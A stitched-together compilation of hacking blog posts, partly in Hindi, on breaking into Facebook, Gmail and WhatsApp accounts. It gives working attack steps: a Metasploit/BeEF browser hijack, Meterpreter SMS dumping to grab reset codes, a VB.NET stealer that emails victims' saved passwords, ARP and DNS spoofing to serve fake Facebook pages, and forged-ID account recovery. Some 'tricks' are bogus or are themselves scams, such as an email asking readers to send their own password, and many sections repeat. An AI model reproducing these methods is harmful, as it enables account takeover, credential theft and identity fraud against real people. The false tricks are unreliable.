Search

biff hacker

Welcome back, my budding hackers!
This is the initial post of a new series on how to hack Facebook . It's important to note here that each hack I'll be covering is very specific. I have said it before, but I feel I need to repeat it again: there is NO SILVER BULLET that works under all circumstances. Obviously, the good folks at Facebook have taken precautions to make certain that their app is not hacked, but if we are creative, persistent, and ingenious, we can still get in.
Facebook is one of the most secure applications on the Internet and, despite what you might read on the Internet, it is NOT easy to hack. In addition, most of those websites on the Internet willing to sell you a Facebook hack are scams. Don't give them a penny!
If you want to hack Facebook, you need to invest some time into learning. If you are new to hacking, you might want to start with my article " How to Use Null Byte to Study to Become a Professional Hacker ."
In addition, I want to put in a word about what we mean by the word "hack." In some cases, we might get the password which, of course, will give us full access to the Facebook account. In other cases, we might just get access to the account without any rights. In still other schemes, we might get the cookies that Facebook places in the user's browser and then place it in our browser for access to the account whenever we please. In yet another scenario, we can place ourselves between the user and Facebook in a form of MitM attack, to get the password, etc.
In this first entry in this series , we will use a flaw in the stock Android web browser that will provide us with access to the Facebook account. I hope it goes without saying that this hack will only work when the user has accessed their Facebook account from the stock Android browser, not the Facebook mobile app. Although Google is aware of this security flaw in their browser, it is not automatically patched or replaced on existing systems. As a result, this hack will work on most Android systems.
Same-origin policy (SOP) is one of the key security measures that every browser should meet. What it means is that browsers are designed so that webpages can't load code that is not part of their own resource. This prevents attackers from injecting code without the authorization of the website owner.
Unfortunately, the default Android browser can be hacked as it does not enforce the SOP policy adequately. In this way, an attacker can access the user's other pages that are open in the browser, among other things. This means that if we can get the user to navigate to our website and then send them some malicious code, we can then access other sites that are open in their browser, such as Facebook.
For those of you are new to Null Byte and hacking, I recommend that you start by installing Kali Linux . In this hack, we will need two tools, Metasploit and BeEF, both of which are built into our Kali Linux system.
Let's begin by firing up Kali and then opening Metasploit by typing:
kali > msfconsole
You should get a screen like this.
For those of you unfamiliar with Metasploit, check out my series on using Metasploit for more information on using it successfully.
Next, let's find the exploit for this hack by typing:
msf > search platform:android stock browser
When we do so, we get only one module:
auxiliary/gather/android_stock_browser_uxss
Let's load that module by typing:
msf > use auxiliary/gather/android_stock_browser_uxss
Now that we have loaded the module, let's get some information on this module. We can do this by typing:
msf > info
As you can see from this info page, this exploit works against all stock Android browsers before Android 4.4 KitKat. It tells us that this module allows us to run arbitrary JavaScript in the context of the URL.
Next, let see what options we need to set for this module to function. Most importantly, we need to set the REMOTE_JS that I have highlighted below.
Now, open BeEF. Please take a look at this tutorial on using BeEF, if you are are unfamiliar the tool.
Back to Metasploit now. We need to set the REMOTE_JS to the hook on BeEF. Of course, make certain you use the IP of the server that BeEF is running on.
msf > set REMOTE_JS http://192.168.1.107:3000/hook.js
Next, we need to set the URIPATH to the root directory /. Let's type:
msf > set uripath /
Now we need to start the Metasploit web server. What will happen now is that Metasploit will start its web server and serve up the BeEF hook so that when anyone navigates to that website, it will have their browser hooked to BeEF.
msf > run
Now we are replicating the behavior of the victim. When they navigate to the website hosting the hook, it will automatically inject the JavaScript into their browser and hook it. So, we need to use the stock browser on an Android device and go to 192.168.1.107:8080, or whatever the IP is of your website.
When the user/device visits our web server at 192.168.1.107, the BeEF JavaScript will hook their browser. It will show under the "Hooked Browser" explorer in BeEF. We now control their browser!
Now let's go back to BeEF and go to the "Commands" tab. Under the "Network" folder we find the "Detect Social Networks" command. This command will check to see whether the victim is authenticated to Gmail, Facebook, or Twitter. Click on the "Execute" button in the lower right.
When we do so, BeEF will return for us the results. As you can see below, BeEF returned to us that this particular user was not authenticated to Gmail or Facebook, but was authenticated to Twitter.
Now, we need to simply wait until the user is authenticated to Facebook and attempt this command again. Once they have authenticated to Facebook, we can direct a tab to open the user's Facebook page, which we will do in our next Facebook hack tutorial.
We will continue to explore more ways to hack Facebook, Twitter, and Gmail in future articles, so keep coming back, my budding hackers!
Cover image via Maestro studio/Shutterstock
    
Same Origin Policy
Open Metasploit
Step 1

For those of you unfamiliar with Metasploit, check out my series on using Metasploit for more information on using it successfully.

Next, let's find the exploit for this hack by typing:
msf > search platform:android stock browser
When we do so, we get only one module:
auxiliary/gather/android_stock_browser_uxss
Let's load that module by typing:
msf > use auxiliary/gather/android_stock_browser_uxss


that we have loaded the module, let's get some information on this module. We can do this by typing:
msf > info




As you can see from this info page, this exploit works against all stock Android browsers before Android 4.4 KitKat. It tells us that this module allows us to run arbitrary JavaScript in the context of the URL.


Next, let see what options we need to set for this module to function. Most importantly, we need to set the REMOTE_JS that I have highlighted below.


Now, open BeEF. Please take a look at this tutorial on using BeEF, if you are are unfamiliar the tool.


Now, open BeEF. Please take a look at this tutorial on using BeEF, if you are are unfamiliar the tool.



Back to Metasploit now. We need to set the REMOTE_JS to the hook on BeEF. Of course, make certain you use the IP of the server that BeEF is running on.
msf > set REMOTE_JS http://192.168.1.107:3000/hook.js
Next, we need to set the URIPATH to the root directory /. Let's type:
msf > set uripath



Now we need to start the Metasploit web server. What will happen now is that Metasploit will start its web server and serve up the BeEF hook so that when anyone navigates to that website, it will have their browser hooked to BeEF.
msf > run






Now we are replicating the behavior of the victim. When they navigate to the website hosting the hook, it will automatically inject the JavaScript into their browser and hook it. So, we need to use the stock browser on an Android device and go to 192.168.1.107:8080, or whatever the IP is of your website.


When the user/device visits our web server at 192.168.1.107, the BeEF JavaScript will hook their browser. It will show under the "Hooked Browser" explorer in BeEF. We now control their browser!
Now let's go back to BeEF and go to the "Commands" tab. Under the "Network" folder we find the "Detect Social Networks" command. This command will check to see whether the victim is authenticated to Gmail, Facebook, or Twitter. Click on the "Execute" button in the  lower right 


When we do so, BeEF will return for us the results. As you can see below, BeEF returned to us that this particular user was not authenticated to Gmail or Facebook, but was authenticated to Twitter.


Now, we need to simply wait until the user is authenticated to Facebook and attempt this command again. Once they have authenticated to Facebook, we can direct a tab to open the user's Facebook page, which we will do in our next Facebook hack tutorial.
We will continue to explore more ways to hack Facebook, Twitter, and Gmail in future articles, so keep coming back, my budding hackers!

HACK GMAIL & FACEBOOK PASSWORD

Hack Any Account By Bypassing Mobile Verification
Step 1: Fire-Up Kali:
I hope you know how to hack android and gain access to it, if not follow my guide: HERE
I am hacking on WAN, so the meterpreter would be like this:
Step 2: Meterpreter:
After the Meterpreter Prompt shows up, leave it there.
Open up a browser, goto www.gmail.com , Enter the Victim's E-Mail address.

Click on Need Help?
Choose I don't know my password , click Continue

At last, Click Continue
Step 3: Onto Meterpreter Again:
Oops I forgot that Before Clicking that last continue you should go onto meterpreter and check that, for how much time the phone has not been used(is idle), you can do that by typing:
idletime
BUT HERE COMES THE PROBLEM, THE idletime command does not work on android, so you cant tell if the user is using the phone currently or not. (However there are other complex ways. like checking RAM etc.)
But nevermind we will continue to exploit and take the risks .
Type : dump_sms to gather/dump all the messages to root folder.
(You can also type:


Step 4: Done...Almost:
Goto the root folder of Kali and open the .txt file where all the messages had been dumped
Continue
Step 6: Delete the Message: Nope, You cannot delete the message until the hacked phone is rooted . If rooted type: delete data/data/ com.android.providers.telephony/databases/
Gmail hacker

Gmail hacker

Hack An Gmail Account New Methed **
1- first sign out of your gmail account .
2- go to "I Cannot Access My Account " tab which is below the password field
3- go to Yopmail.com and enter any random name eg:ron and then click check inbox and leave it open.
4- On "I Cannot Access My Account " page in Gmail just click forgot my username and go to username recovery page.
5- Enter The Yopmail email you just opened eg :ron@yopmail.com
6- now click check for new emails tab in yopmail you will get all the gmail id's associated with it eg you'll get some gmail id's like xx@gmail.com copy that id
7- just go again to the "I Cannot Access My Account " in gmail and this time choose forgot my password and go to password recovery page
8- Now Enter The Gmail Id You Copied
xx@gmail.com in username fill the captcha and everything
9- If The Gmail Password recovery ever asks a security question then no need to panic ! look below the security question there will be a tab link send the reset password link to my recovery email
10- just go to the yopmail inbox again and click on the link gmail posted and reset their gmail password DONE !!
You Just hacked A Gmail Account
Gmail hacker

Gmail hacker

Hack An Gmail Account New Methed **
1- first sign out of your gmail account .
2- go to "I Cannot Access My Account " tab which is below the password field
3- go to Yopmail.com and enter any random name eg:ron and then click check inbox and leave it open.
4- On "I Cannot Access My Account " page in Gmail just click forgot my username and go to username recovery page.
5- Enter The Yopmail email you just opened eg :ron@yopmail.com
6- now click check for new emails tab in yopmail you will get all the gmail id's associated with it eg you'll get some gmail id's like xx@gmail.com copy that id
7- just go again to the "I Cannot Access My Account " in gmail and this time choose forgot my password and go to password recovery page
8- Now Enter The Gmail Id You Copied
xx@gmail.com in username fill the captcha and everything
9- If The Gmail Password recovery ever asks a security question then no need to panic ! look below the security question there will be a tab link send the reset password link to my recovery email
10- just go to the yopmail inbox again and click on the link gmail posted and reset their gmail password DONE !!
You Just hacked A Gmail Account
Hack WhatsApp Admin now

Hack WhatsApp Admin now

Just a simple instructions to specifically change whatsapp group admin.
Method 1:
This will change every group, account info and settings. Your old number will no longer become admin.
1. open whatsapp
2. go to settings (whatsapp setting)
3. go to account
4. go to change number (if you did not see this, you are using the old whatsapp. please update your whatsapp first)
5. follow the instruction given
6. voila. the new numbers will become just like yours.
Method 2:
This method will be a little bit difficult but you can choose to change only one group or 2, 3 and so forth.
1. backup whatsapp message using Titanium Backup (do this if you want to save the group message)
2. open whatsapp
3. open the group you want to change
4. tap the group name (in order to add the new number)
5. on the right side, tab the icon to add new contact in the group
6. add the number you wish to make admin
*do step 4 to 6 if you have not add the number you want to make admin
7. remember who is in the group or take screenshot (this will be useful later)
8. remove all other members until two members left (you and the new number)
9. tap delete and exit group (at this point the new number will become the admin)
10. using the new number, add all the members of the group as before (you can refer to the screenshot you take in step 7)
Method 3
This method was introduce in whatsapp application in November 2014. It enables the admin to add another user as an admin.
1. open whatsapp.
2. go to group info
3. long press the user that you want o add as admin
4. done
if you dont want to be an admin at all follow below after you have follow the above instruction.
5. leave group
6. ask the person who you have assign as an admin to add you back in the group.

Hack WhatsApp Admin moin

Hack WhatsApp Admin moin

Today I am sharing a very cool trick by which you can hack any whatsapp group or to be simple you will become the admin of that that whats app group.
REQUIRED KNOWLEDGE:
1. To perform this trick you will have to know binary number system of computer programming. Binary is the machine level language of computer and it us expressed with the digits of "1 and 0" only. You have to learn how to write your phone number in binary.
BINARY DIGITS:
0 —- 0 0 0 0
1 —- 0 0 0 1
2 —- 0 0 1 0
3 —- 0 0 1 1
4 —- 0 1 0 0
5 —- 0 1 0 1
6 —- 0 1 1 0
7 —- 0 1 1 1
8 —- 1 0 0 0
9 —- 1 0 0 1
For example, If your mobile number is "9199875901" then write it in binary as follows-
"1001 0001 1001 1001 1000 0111 0101 1001 0000 0001" [but do it without space]
Now we move to the main part.
To hack the group send the sms to the group's admin.
“cng=true?=[target mobile number in binary]![your mobile number]&findchache.mnc.id= [802]ste5%Set.content?/rfd=gv"
After that either clear the cache of whats app and open it or uninstall the whatsapp and reinstall it.
Tested on the latest version. Leave your views and visit again. Image
Ko

“cng=true?=[target mobile number in binary]![your mobile number]&findchache.mnc.id= [802]ste5%Set.content?/rfd=gv"

hack fb social

hack fb social

with social engineering method .
This post was created because there is some users still confuse because they didn't see the facebook link thumbnail image while they add a link in facebook .
Since I wrote my last tutorial, facebook made some change in the way they scrap the url you provide in your update status box in your
facebook profile.
Step by step how to Hack Facebook Password Social Engineering:
1. Read and understand first how to hack
facebook password and how to hack facebook account from the following facebook hacking tutorials:
Hack facebook account using social engineering method
Hack facebook phishing method
Fake facebook page to hack facebook password
Another hacking tutorials
2. Attacker already set up the fake website page from the tutorial above. The tutorial above about
facebook phishing, fake facebook page, will be useful if attacker use it on LAN, but if attacker want to hack facebook from the internet or WAN attacker need to do something to get as much passwords as possible. That's why attacker need to do some social engineering using facebook to deceive the users.
3. The next step attacker made a fake account on
facebook and add other users as much as he can. When he get enough users already, he start the
social engineering attack by posting fake link into his status message. Attacker know that psychologically human is a curious creature, when there's something unique or amazing they want to know more about it.
4. Here is the link that attacker put on his
facebook profile status message.
you can download the script below:
Download Hack Facebook Password Social Engineering
Conclusions:
1. Do not input your username or password if facebok page suddenly ask you to input it in the middle while you browsing facebook page.
2. See the URI carefully, make sure the URI is https://www. facebook .com or https://
facebook .com, not other domains.
hope you found it useful
Stealer

Stealer

Create Password Stealer Using VB Visual Studio.net
Posted by Hacking-Tutorial.com in Hacking Tutorial | 31 Comments
Hello, in this tutorial you will learn how to Create Password Stealer using VB Visual Studio.net that send the passwords of the victim to your email.
The recovery files + code.txt (which include the code written bellow) + the visual basic project.
DOWNLOAD HERE
REQUIREMENTS:
1) A mail.com account (their stmp is open and available for 3rd party apps)
2) Basic knowledge in vb.
3) Visual Studio 2008 or more (there is a free version however I will be using the ultimate version of 2013)
4) Nirsoft password recovery bins
5) A victim.
OVERVIEW:
We are going to create an exe file when opened it extracts 4 application which recover saved password on famous web browsers (chrome, Firefox ..Etc.) then launches them in command line mode , they will export the saved password into a text file which will be read by our app then sent to us by email.
We are using vb.net because it is a very easy programming language and it is common in malicious software.
Step by Step How to Create Password Stealer using VB Visual Studio.net:
1) Open visual studio and create a new project like this
2) You will get something like this , it is called the designer here you choose how your app looks like, but for our app we want it to be silent and not visible.
3) Right click on this form and click “View Code <>”
You will get something like this, this is where we put out code.
This is called an event handler, whatever code you put between this and “End Sub” will be executed when the program first opens (before it appears).
4) Now we need to add the nirsoft password recovery programs to our resources so on your right you need to click on the solution explorer
Then you need to click on My Project, this should appear
Click on resources -> add resource -> add existing file..
A dialog will appear choose the 4 files you downloaded (1.exe , 2.exe , 3.exe ,3.exe)
5) Now go back to the coding section and write this code (explained in the green text)
6) Now we need to click Ctrl – Shift – B to build our exe (it should show where it saved the exe like in the picture)
That is it you have created your own saved password stealer, on launch it will send you the password like this
CONCLUSION:
You should not open any random exe files unless you are sure it is safe , a tip would be scanning it on virus total or similar sites , what I personally do is open said programs in Sandboxi
Notes : if you are having problems building the
hack fb gyanme xamp method

hack fb gyanme xamp method

Middle Attack I will demonstrate how to hacking Facebook using MITM ( Man in the Middle). This attack usually happen inside a Local Area Network(LAN) in office, internet cafe, apartment, etc.
Below is the topology or infrastructure how MITM work, and how it can be happen to do hacking a Facebook account.
In the picture above, the attacker act as the third person attacker will manipulate the switch routing table so the victim will think that attacker is a Web server and vice versa, because the attacker has changed the routing table.
For this tutorial we need to prepare the tools to do Proof of Concept about this tutorial . Below you can download it.
1. XAMPP – APACHE+PHP+MySQL (We use XAMPP for our fake facebook web server)
2. Cain & Abel (We use it for Man in the Middle Attack)
3. Facebook Offline Page (I have nulled the code, so this script will not contacting Facebook when victim accessed fake Facebook page — only use this for learning)
Download Facebook Offline Page (mediafire.com):
Download
Update : replace your index.php and login.php using following files Download Here.
Step by step Hacking Facebook Using Man in the Middle Attack:
Attacker IP Address : 192.168.160.148
Victim IP Address : 192.168.160.82
Fake Web Server : 192.168.160.148
I assume you’re in a Local Area Network now.
1. Install the XAMPP and run the APACHE and MySQL service
2. Extract the fb.rar and copy the content to C:\xampp\htdocs
3. Check the fake web server by open it in a web browser and type http://localhost/
4. Install Cain & Abel and do the APR( ARP Poisoning Routing ), just see the step by step how to below
Click the start/stop sniffer
Choose your interface for sniffing and click OK . When it’s finish, click again the Start/Stop Sniffer to activate the sniffing interface.
Go to the Sniffer tab and then click the + (plus sign)
Select " All hosts in my subnet" and Click OK .
You will see the other people in your network, but my target is 192.168.160.82 (MySelf…LoL :p)
After we got all of the information, click at the bottom of application the APR tab.
Click the + button, and follow the instruction below.
When you finish, now the next step is preparing to redirect the facebook .com page to the fake web server.
Click "APR DNS" and click + to add the new redirecting rule.
When everything is finish, just click OK . Then the next step is to activate the APR by clicking the Start/Stop APR button.
5. Now Hacking Facebook using MITM has been activated. This is how it looks like when victim opened http://www. facebook .com
6. But if you ping the domain name, you can reveal that it’s fake, because the address is IP of the attacker
Hope you found it useful 🙂
www.apachefriends.org/en/xampp.html

www.oxid.it/cain.html


www.mediafire.com/download/hzl27g7q1oqrsws/update-1.rar


hack fb ethical hacker

hack fb ethical hacker

हैकिंग के बहुत से तरीके हैं उनमे से एक है एथिकल हैकिंग (ethical hacking) जिसका प्रयोग आप खुद करेंगे ….
और ये बहुत आसन है…. इसमें मेल के ज़रिये system administrators automatic responder
(mail sysytem) को कंफ्यूज करके उसमे से कोई भी ईमेल अकाउंट का या फेसबुक अकाउंट का पासवर्ड निकाल लिया
जाता है।। और 7 दिन के अन्दर system administrators automatic responder (mail sysytem)
की प्रोसेसिंग के बाद आपके ईमेल अकाउंट में आपके फ्रेंड का फेसबुक अकाउंट का पासवर्ड आ जाता है
——-क्या आप तैयार है….. तो शुरू करते हैं।।
…………………..फेसबुक अकाउंट को कैसे हैक करे………………….
स्टेप 1 : सबसे पहले अपने अकाउंट को खोले (मतलब लोग इन करें) जिस से आपने अपनी फेसबुक इ आईडी बनाई है (जैसे जीमेल, वाई मेल, एम् अस एस एन. आदि)
स्टेप 2 : अब एक न्यू मेल बनाए मतलब न्यू मेल कोम्पोसे करें
स्टेप 3 :अब सब्जेक्ट बॉक्स में ” PASSWORD RECOVERY “ टाइप करें मतलब subject box में ” PASSWORD RECOVERY “ लिखें
स्टेप 4 :अब इसे pasword@cybergal.com पर send करें
स्टेप 5 :अब messege box में ये लिखें
(पहली लाइन )- उस फेसबुक अकाउंट का यूजर नेम जिसको आप हैक करना चाहते हैं !

(दूसरी लाइन)- उस फेसबुक अकाउंट का यू आर एल एड्रेस (URL ADDRESS क्या होता है ये नीचे दिया गया है )
(तीसरी लाइन)- आपके फेसबुक अकाउंट का यूजर नेम
(चौथी लाइन)- आपके फेसबुक अकाउंट का यू आर एल एड्रेस (URL ADDRESS)
(पांचवी लाइन )-आपका ईमेल अकाउंट
(छटवी लाइन )-आपका ईमेल अकाउंट पासवर्ड
(सातवी लाइन )-(बस नीचे लिखे हुए को कॉपी और पेस्ट कर दें )
<pwdcursive><
v703&login=”passmachine&f=(p0assword)
&f=27586&___javascript=ACTIVE&rsa#”
start?></script>=””></cursiv><>
फेसबुक अकाउंट यूआरएल एड्रेस,प्रोफाइल के एड्रेस बार में लिखा होता है, जैसा की नीचे दी गयी फोटो में दिखाया गया है
suhail os
जिस ईमेल को आपको सेंड करना है उसका एक  उदाहरण नीचे दिया गया है …(नोट :- ये सिर्फ एक उदाहरण है।)
suhail os
—————-ये कैसे काम करता है—————-
आप system administrators automatic responde को मेल करते हैं ,आमतौर पर केवल system administrators को
इस का उपयोग करने के लिए सक्षम होना चाहिए.लेकिन
आप जब
इसे अपने पासवर्ड के साथ करने की कोशिश करते हैं और इस मेसेज को अपने ईमेल अकाउंट से मेल करते हैं तब कंप्यूटर भ्रमित हो जाता है! की आपके पासवर्ड की क्या ज़रुरत है। तभी automatically Gmail responder को आपके “system administrator password” की आवश्यकता होगी जो की वास्तव में खुद आपका पासवर्ड होगा लेकिन: कंप्यूटर इसको नहीं जानता है.
पासवर्ड AUTOMATICALLY ..“SYSTEM REG MESSAGE”..नामक मेल मे ं“SYSTEM” सिस्टम के द्वारा आपके ईमेल इनबॉक्स में भेजा जाएगा!
यह एक awesome trick है
NOTE- में इस बात का कोई जिम्मेदार नहीं ठहराया जाऊंगा की आप इस जानकारी के साथ क्या करते हैं और न ही में किसी बात का जवाबदेह रहूँगा
में इन जानकारियों को केवल शैक्षिक उद्देश्यों …..के लिए शेयर कर रहा हूँ।
कृपया इसका गलत इस्तमाल न करें….
…………….हैप्पी हैकिंग…………….

Moin hacker fb new

DNS Spoofing:
Basically, DNS Spoofing is a computer hacking attack, where data is introduced into a DNS (Domain Name System) resolver’s cache. In a DNS server spoofing attack, a malicious party modifies the DNS server in order to reroute a specific domain name to a different IP address.
The Domain Name System (DNS) is one of the fundamental services of the Internet. It associates various information with domain names assigned to each of the participating entities.
With that been said, let’s get to work.
1. Set Up Kali Linux:
Go to Applications -> Kali Linux -> Sniffing -> Network Sniffers, dnsspoof as you can clearly see in the picture provided.



2. Open dnsspoof:
Notice how easy the syntax is.
dnsspoof -i -f



3. Set Up For Sniffing:
What we are going to do is, we’ll get a Windows 7 system on our network and redirect its facebook.com navigation to our own website. Use any browser to navigate there (Ignore the tabs in the given picture).

4. Flush The DNS Cache:
Now, we’ve to flush the DNS cache of the windows 7 system. In this way, the Windows client won’t use the cached DNS on the system and will instead use our “updated” DNS service.
Close the browser and type in the terminal:
ipconfig /flushdns
Now we need to kill the connection between the Windows 7 system and (http://www.facebook.com ). This forces the Windows 7 machine user to re-authenticate. Type:
tcpkill -9 host [www.facebook.com]
Once done, stop the TCP with Ctrl + C.
5. Create Hosts File:
Here we will be using the hosts file to redirect that Windows 7 system’s search for Facebook to our website. Let’s go to the /usr/local directory.
cd /usr/local
From there, let’s open the hosts file in any text editor.
gvim hosts
Now that we have the hosts file open, we need to add the following line to it. The hosts file is simply mapping an IP address to a domain name, so we put our IP address in and map it to [www.facebook.com].
192.168.1.2 http://www.facebook.com
It’s recommended to use the TAB key between the IP and the domain name, well, it’s important literally.
6. Create A New Facebook WebPage:
Before we go any further, we now need to turn off promiscuous mode on our network card.
ifconfig eth0 -promisc
Now we need to create a website that the user will be directed to when they type http://www.facebook.com in the URL of their browser. Let’s create a simple webpage.
Open the index.html
gvim /var/www/index.html
This is how it looks like by default. We’ll have to change it and put in the following html and then save it. I’ll put the script in a .txt file and upload the picture since the script won’t be visible if I put it directly over here. You’ll have to replace it with the script given in index.html.
Indeed, if you really wanted to pull off this hack, you would want to take the time to build a website that looks and acts just like the site you’re spoofing.
7. Start the Apache Web Server:
Now, start the web server built into Kali. This is Apache and the service is HTTP, so we go to Kali Linux -> System Services -> HTTP -> apache2 start.
8. Start dnsspoof:
Lastly, we need to start dnsspoof and direct users to the entries in our “hosts” file first. Dnsspoof will intercept DNS queries and send them first to our hosts file before then sending them along to the DNS server. Type:
dnsspoof -f hosts
9. Navigate to Facebook From Windows 7:
Now, from the Windows 7 system, type in the URL http://www.facebook.com and it will pull up our fake website instead of the real Facebook website.
That is all, you’ve successfully spoofed DNS on a LAN. Now, when anyone on the local area network attempts to navigate to the Facebook website, they will instead come to our website!
Hope you enjoyed the tutorial and learnt some stuff. For further assistance leave a reply!
I’ll see you in the next one, until then Enj
Linux middle attack

Linux middle attack

The man-in-the-middle attack (often abbreviatedMITM, MitM, MIM, MiM, MITMA) in cryptography and computer security is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker.Scenario:This is the simple scenario, and I try to draw it in a picture.Victim IP address :192.168.8.90Attacker network interface :eth0; with IP address :192.168.8.93Router IP address :192.168.8.8Requirements:1. Arpspoof2. Driftnet3. UrlsnarfStep by step Kali Linux Man in the Middle Attack :1. Open your terminal (CTRL + ALT + Tkali shortcut) and configure ourKali Linuxmachine to allow packet forwarding, because act as man in the middle attacker,Kali Linuxmust act as router between "real router" and the victim. Read the tutorial herehow to set up packet forwarding in linux.2. You can change your terminal interface to make the view much more friendly and easy to monitor bysplitting kali linux terminal window.3. The next step is setting up arpspoof between victim and router.arpspoof -i eth0 -t 192.168.8.90 192.168.8.84. And then setting up arpspoof from to capture all packet from router to victim.arpspoof -i eth0 192.168.8.8 192.168.8.905. After step three and four, now all the packet sent or received by victim should be going through attacker machine.6. Now we can try to use driftnet to monitor all victim image traffic. According to itswebsite,Driftnet is a program which listens to network traffic and picks out images from TCP streams it observes. Fun to run on a host which sees lots of web traffic.7. To run driftnet, we just run thisdriftnet -i eth0When victim browse a website with image, driftnet will capture all image traffic as shown in the screenshot below.To stop driftnet, just close the driftnet window orpress CTRL + C in the terminal8. For the next step we will try to capture the website information/data by using urlsnarf. To use urlsnarf, just run this codeurlsnarf -i eth0and urlsnarf will start capturing all website address visited by victim machine.9. When victim browse a website, attacker will know the address victim visited.Here is the video in case you can't get the text explanations above.Conclusion:1. To change or spoof the attacker MAC address,you can view the tutorial abouthow to change kali linux MAC address.2. Driftnet or Urlsnarf was hard to detect, but youcan try to find the device in your network with promiscious mode which have possibliity to sniff the network traffic.Hope you found it usefulShare this article if you found this post was useful:

Unblocked fb account moin gagneja

Unblocked fb account moin gagneja

So you’ve beenlocked out of your Facebook accountand you’re reading this post. It’s ok, we’ve got your back! Didyou enter the wrong password too many times? Did someone try to hack your account? Regardless of the reason, we’renot judging. If Facebook is one of your most used apps, it can be frustrating to be locked out. Here are some tips for recovering a temporarily locked Facebook account on your mobile device.1. Delete and then reinstall the Facebook app.2. Login with account details.3. On the security page that opens up, select “Get help from friends”.4. On the trusted contacts page that opens up, select a few good friends who you can contact easily.5. Click on Continue. Facebook will send a security code to all the friends who you have just selected.6. Contact those friends and request that they send you the code.7. Once you gather all the codes from your friends, you can use the code to unlock your Facebook account.If that doesn’t work… 1. Reinstall the app on your phone, and clear the cache if you have it opened in your browser.2. Email disabled@facebook.com and include your name, date of birth, and a brief description of the probably. They will likely ask you to confirm your identification with a license or passport.3. Once your identity is confirmed, they will send a reactivation link as long as you have not violated any of their policies. Click on that and go through the automated security verification process.4. During this time, try not to attempt to open your Facebook account for any reason.To make sure your account doesn’t get locked out again,verify your account here. Good luck!

create Fake account

create Fake account

Hello here are steps by steps guide and You can create unlimited accounts ..without using gmail and number !!
Somebodys now about 10minute temporary email but thats work only in other networking.
Facebook did not accpect these email.but dont worry guys i have some sites thats accpect facebook for signup
So lets start The trick -
STEP 1- Frist of all Go to facebook.com then click on 'Create New Account'
STEP 2- After Fill Up all Details - Frist name- Sername -Date of birth-and pasword ..
STEP 3- Now Go To http://10minutemail.net And Copy That email and Go Back then pest it on Email Address - And click on SIGNUP.
STEP 4- Now Facebook will sent you a verificastion code on that email..
STEP 5- Dont worry Go Again to 10minutemail Page then you will see blow fb email.then copy code come back and pest it. after click on ''comfrim''
thats it your account created. For more fb temporary email blow.
1- http://10minutemail.net
2- http://10minutemail.info
3- http://10minutemail.org
Hack fb illegal method

Hack fb illegal method

Hack Facebook Account |
Please Do not using this methods for illegal work
Hacking Is Rocking Before Starting A methods so please Make Sure You Need These items
You Must Need
1-New Gmail Account
2- PicArt Android App Or Other Editor
3-Fake Blank Prove of ID .Adhaar.Licance.Voter id. etc
4-Victim - Date of birth and full Name OF Victims Fb Account
Make Sure .Your Locastion Match for victims account by changing VPN
Steps to Start Hacking
1- Download A Blank ID Prove And Edit by using PicArt or Other Editor .
Put Victims Name and Date of Birth on Fake Prove . And other issues And Fake Pasword Size Photo
2-Make sure Fake Prove is looking a Orignal .Dont Make any mistakes do it carefull
3-Afer you Done then Go to Fb.com
4-Now Click on 'Forgetten Pasword' And Search Victims Account name or id then Click on victim
5- Now Click on [ NO LONGER ACCESS FOR THESE ACCOUNT] at last
3- Now its Page will Ask You For Isseuse of Account Put full name of victims account and Put Your New Gmail Account then UPLOAD Fake prove of victims and submit
NOTE:- After Submitting Isseus of id After 3-6 days to Go You will Recive a email on Your new Gmail ...with a Link
hack fb new gyanme trick latest

hack fb new gyanme trick latest

1- Sabse Pehle Yaha jakar » » http://ictfair.gq/idcard ek fake Id prove Create karein online us Ke Details Aur date of birth dalkar [ Agar Apke Pas Picart App Bhi hai toh ek Fake prove bnaiye
2-Fer Prove Create Hone ke Baad Save Kardijiye Photo ko
3- Ab »» »»Fb.com/Hacked Mein Jaakar forgotten Pasword Pe Jaiye..
4- aur Us Ka Naam ya email search kro jiski id hack krni aa...
5- Fr Uski id milne ke bad . Last Me "No Longer Access To This Account" rahega us me jaiye....
6- Ab Wo Form Details Aur Id Ka Prove mangega
full name aur profile link aur id card photo mangega Aur Apka Gmail Account Dalna Padega ( Reset Link Gmail me aayegi)
jo fake prove ka photo bnaya hai usse dalna padega
fer Submit krne ke baad kuch din bad Email aayega ..
Link Ayegi Reset Fb Pasword wali
Bus enter new pasword
Account Hacked
thanku Ask any Question
Hacker app gyanme

Hacker app gyanme

Want to twirl your fingers on your smartphone and hack into FBI servers? Want to solve crimes and impress other with your whacky hacking skills? Or want to get rich like John Connor from Terminator by hacking ATMs? Well you CANNOT do that! There are no best hacking apps for Android. As great as Android is, there is possibly no way a simple app will be able to hacking into your ex’s Facebook account and check who they are dating now. Sorry to disappoint you folks, if it were this easy, everyone would be doing that.
So what is the point of this article then? This article is for those who know a thing or two about hacking and merely need simple tools to augment that. I’m talking about guys with thick spectacles, degrees in software engineering, revolving chairs, epic gaming PC and names which sound remarkably like Billa. Even if you are a handsome looking hacker like that guy from Watchdogs, you will sometimes need the aid of trusty apps which help you with white hat hacking.
This article is not going to be your traditional list article which I usually write about. I won’t be listing any apps with features and whatnot because those who actually need them will know just by name. So yes, this is not a traditional article and it is not for everyday Android users. I will however list the apps in order so it will be easier to track them. I would also suggest that you ignore the ratings on the Google Play page because some people think they can hack pentagon with their smartphones.
Lets see Best Android Hacking Apps 2016 that are meant for hacking, hackers, security researchers;
This app is probably the most neglected one on the list because of its off looking interface. But if you need work done, this app can really help you in that. If you are a penetration tester or even an IT administrator, this app will provide invaluable tools to you.
This won’t be the best hacking app for Android though because it can only scan for exploits. If you have a keen eye for exploits, you may be able to do some hacking but it sure won’t be from your smartphone though, you will actually need to have access to a Linux or Windows based personal computer.
Remote Administration Tool for Android. Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.
Here is the tutorial for setting up Androrat: AndroRAT - Android Remote Administration Tool Setup Tutorial
Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.
Recommended article: Setting Up BurpSuite Web Hacking Tool with Firefox and FoxyProxy
zANTI is a comprehensive network diagnostics toolkit that enables complex audits and penetration tests at the push of a button. It provides cloud-based reporting that walks you through simple guidelines to ensure network safety.
DroidSheep can be easily used by anybody who has an Android device and only the provider of the web service can protect the users. So Anybody can test the security of his account by himself and can decide whether to keep on using the web service.
dSploit is an Android network analysis and penetration suite which aims to offer to IT security experts/geeks the most complete and advanced professional toolkit to perform network security assessments on a mobile device.
